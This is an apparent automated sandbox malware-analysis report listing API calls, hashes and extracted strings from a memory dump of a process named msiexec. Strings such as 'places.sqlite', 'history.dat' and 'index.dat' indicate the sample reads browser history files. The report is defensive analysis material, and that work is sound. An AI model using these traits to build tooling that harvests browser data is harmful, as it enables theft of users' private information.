                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                          • String ID: history.dat$places.sqlite
                                                                                          • API String ID: 2641622041-467022611
                                                                                          • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                          • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                          APIs
                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                          • String ID:
                                                                                          • API String ID: 839530781-0
                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst
                                                                                          • String ID: *.*$index.dat
                                                                                          • API String ID: 1974802433-2863569691
                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$FilePointer
                                                                                          • String ID:
                                                                                          • API String ID: 1156039329-0
                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                          • String ID:
                                                                                          • API String ID: 3397143404-0
                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                          • String ID:
                                                                                          • API String ID: 1125800050-0
                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                          • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandleSleep
                                                                                          • String ID: }A
                                                                                          • API String ID: 252777609-2138825249
                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d
                                                                                          • API String ID: 0-2564639436
                                                                                          • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                          • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: BINARY
                                                                                          • API String ID: 2221118986-907554435
                                                                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp
                                                                                          • String ID: /stext
                                                                                          • API String ID: 2081463915-3817206916
                                                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                          APIs
                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                          • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                          • String ID:
                                                                                          • API String ID: 2445788494-0
                                                                                          • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                          • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                          APIs
                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 3150196962-0
                                                                                          • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                          • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                          APIs
                                                                                          Strings
                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: malloc
                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                          • API String ID: 2803490479-1168259600
                                                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0041BDDF
                                                                                          • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcmpmemset
                                                                                          • String ID:
                                                                                          • API String ID: 1065087418-0
                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                          APIs
                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                          • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1381354015-0
                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free
                                                                                          • String ID:
                                                                                          • API String ID: 1294909896-0
                                                                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                          APIs
                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                          • String ID:
                                                                                          • API String ID: 2154303073-0
                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                          APIs
                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 3150196962-0
                                                                                          • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                          • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                          APIs
                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$PointerRead
                                                                                          • String ID:
                                                                                          • API String ID: 3154509469-0
                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                          APIs
                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                          • String ID:
                                                                                          • API String ID: 4232544981-0
                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                          APIs
                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                          APIs
                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$FileModuleName
                                                                                          • String ID:
                                                                                          • API String ID: 3859505661-0
                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                          APIs
                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
